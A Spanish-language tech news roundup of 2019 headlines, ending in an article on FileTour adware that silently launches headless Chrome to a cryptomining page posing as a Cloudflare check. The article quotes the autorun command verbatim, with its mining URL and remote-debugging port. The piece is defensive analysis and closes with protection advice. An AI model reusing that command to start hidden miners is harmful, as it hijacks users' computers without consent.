Samsung Galaxy Fold Global Variant en un SoR Snapdragon 855

El primer teléfono inteligente plegable de Samsung, el Galaxy Fold, saldrá a la venta en Estados Unidos y Corea del Sur a fines del próximo mes. Antes de su lanzamiento, la variante global del teléfono inteligente con número de modelo SM-F900F ha sido capturada en Geekbench.

Google finalmente activa las vistas previas de tabs en el navegador Chrome

Google está dando los toques finales a otra nueva característica de Chrome que podría estar disponible para los usuarios con la siguiente versión estable.

Clave de cifrado BitLocker de Windows extraida con dispositivo de 30 dolares

Según un descubrimiento reciente extraer la clave de cifrado de BitLocker de un dispositivo Windows sin otros sistemas de seguridad no cuesta más de $ 30.

Google Chrome expone a los usuarios de Android a los hackers

Una vulnerabilidad de seguridad en Chromium de Google permite a los piratas informáticos acceder a datos personales almacenados en dispositivos Android.

Mozilla bloquea Firefox 66 debido a un error de PowerPoint

Mozilla lanzó Firefox 66 a principios de esta semana, pero según un nuevo informe, la compañía suspendió la actualización para algunos usuarios debido a lo que parece ser un problema de compatibilidad con la versión en línea de Microsoft PowerPoint.

Intel facilita la administracion de controladores en Windows 10

Intel ha decidido actualizar su aplicación de Panel de control en Windows 10 con un aspecto, nombre y enfoque completamente nuevos, lo que hace que la tarea de administración de controladores sea muy sencilla en el último sistema operativo de Microsoft.

Grupos de hackers trabajan juntos para distribuir software bancario a nivel mundial

El malware bancario considerado una de las principales amenazas, permite a un desarrollador de malware una manera fácil de obtener acceso a alguien y causar un daño grave.

10 Vulnerabilidades de cisco solucionadas

Cisco lanzó actualizaciones de seguridad con las correcciones para varias vulnerabilidades que afectaron a los productos de Cisco que permiten a los atacantes ejecutar código arbitrario en dispositivos vulnerables de Cisco.

Instagram se enfrenta a un recuento de desinformacion

Los mensajes contra la vacuna y la información errónea están pudriendo la plataforma

Microsoft utiliza el sombreado de tasa variable en DirectX 12

La Conferencia de Desarrolladores de Juegos nos ha mostrado muchas cosas deliciosas cuando se trata del procesamiento de gráficos en tiempo real y, si bien las noticias de Microsoft no parecen tan impresionantes, tienen el potencial de tener un impacto aún mayor.

Amazon admite lo obvio tiene un problema de falsificacion

En su informe anual a la SEC Amazon observó el riesgo de que productos falsificados fueran vendidos por terceros en su mercado a través de CNBC

Bluetooth no esta en el centro de accion de Windows 10

Varios usuarios informan que no pueden habilitar deshabilitar Bluetooth desde el Centro de Acción, incluso si su conexión Bluetooth funciona correctamente y han configurado correctamente el controlador dongle

Como optimizar y desbloquear el Samsung Galaxy S10

El Samsung Galaxy S10 / S10+ es el último dispositivo estrella de Samsung. Aún no está rooteado, aunque el desarrollador de Magisk topjohnwu ha estado trabajando duro en un método confiable de root de Magisk

Mozilla Firefox hackeado en Pwn2Own

Mozilla Firefox y Microsoft Edge fueron pirateados en el segundo día del concurso de piratería Pwn2Own, y en el caso del navegador Windows 10, los investigadores propusieron un enfoque súper complejo e inteligente para escapar de una máquina virtual y entrar al host

Facebook almaceno millones de passwords en texto sin formato

Facebook reveló el hecho de que almacenaban cientos de millones de contraseñas de usuarios en texto sin formato a las que podían acceder 20.000 empleados de la empresa.

Windows 10 de abril de 2019 presenta una nueva politica de actualizacion de Windows

La próxima actualización de Windows 10 de abril de 2019, también conocida como versión 1903 o 19H1, incluirá una nueva política de actualización de Windows que permitirá a los administradores especificar fechas límite para actualizaciones automáticas y reinicios.

Controlador de graficos Linux Nvidia 418.56 con GeForce MX230

Nvidia lanzó un nuevo controlador de pantalla de larga duración para los sistemas operativos GNU / Linux, FreeBSD y Solaris para agregar soporte para un par de tarjetas gráficas recientes y corregir varios errores molestos.

LibreOffice 6.2.2 Office Suite con mas de 50 correcciones

Document Foundation anunció la disponibilidad general del segundo lanzamiento de punto para la última suite de oficina de código abierto y multiplataforma LibreOffice 6.2 para todas las plataformas compatibles, incluidas GNU / Linux, macOS y Windows.

Como bloquear KB4493132 la actualizacion de Windows 7

Con el soporte de Windows 7 llegando a su fin en enero de 2020, Microsoft está tratando de que todos estén conscientes de que seguir este sistema operativo básicamente expone sus datos a los piratas informáticos.

Adware lanza mineros en el navegador que simula ser Cloudflare

FileTour es un paquete de adware que comúnmente se extiende como grietas o trampas para juegos y otro software

Este paquete es conocido por cruzar la línea entre lo que tradicionalmente se conoce como adware y PUP y otras infecciones informáticas más peligrosas, como troyanos y mineros que roban contraseñas.

Este paquete de adware ha comenzado a crear una ejecución automática de Windows que inicia automáticamente Chrome y se conecta a una página de minería en el navegador cuando un usuario inicia sesión en Windows. Para empeorar las cosas, lo hace de forma tal que Chrome es invisible para el usuario.

El comando utilizado para iniciar Chrome cuando un usuario inicia sesión en Windows es: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --headless --disable-gpu --remote-debugging-port=9222 https://de-mi-nis-ner2.info/cdn-41.html?t=0.4

Este comando hará que Chrome se abra en un estado invisible sin cabeza, sin aceleración de hardware de la GPU, para habilitar la depuración remota en el puerto 9222 y para conectarse automáticamente a https://de-mi-nis-ner2.info/cdn-41.html?t=0.4.

Cuando el navegador abre esta página en segundo plano, ejecutará JavaScript incrustado que inicia una secuencia de comandos miner en el navegador de CoinCube. Esto causará que Chrome aumente hasta un 70-80% de utilización de CPU en el Administrador de tareas, ya que extrae criptomonedas, aunque Windows no esté visible.

Como puede ver, al usar una ventana de minero sin navegador en el navegador, la mayoría de las personas ni siquiera notarán que están infectadas con algo. Sí, es posible que su computadora se sienta lenta y algunos incluso verifiquen el Administrador de tareas y noten el extraño comportamiento de Chrome, pero para la mayoría de los usuarios, este minero puede funcionar durante días, si no semanas, sin ser detectado.

La página de minería del navegador pretende ser una página de verificación de Cloudflare

Si bien la mayoría de las personas no verán el sitio que se abre en una ventana normal del navegador, por supuesto que eché un vistazo. Lo que fue interesante, es que esta página pretende ser una página de verificación anti-DDoS Cloudflare pidiendo a un visitante que confirme que es humano.

Aunque esta página parece una página de verificación de Cloudflare legítima, al hacer clic en la casilla de verificación no se hace nada. Además, la fuente muestra claramente que se está cargando la secuencia de comandos CoinCube, que no es algo que Cloudflare está haciendo.

Protéjase de los mineros en el navegador

Los mineros se están convirtiendo en una epidemia y la exploración minera solo continuará empeorando. Por lo tanto, es importante que todos los usuarios se protejan instalando un software antivirus que detecte cuándo un navegador se conecta a servicios de minería conocidos, como CoinCube.

Desafortunadamente, los nuevos servicios de exploración minera siguen apareciendo y se ha convertido en un juego de whack-a-mole para la industria de la seguridad. Por lo tanto, es posible que su software instalado no detecte la URL o los scripts asociados con un nuevo minero en el navegador.

Para agregar más protección, puede usar un bloqueador de anuncios con Chrome, que bloqueará los scripts de minería en el navegador. Para aquellos que buscan un enfoque más granular, puede usar el sitio CoinBlockerLists para descargar listas de direcciones IP y dominios afiliados a la minería en el navegador.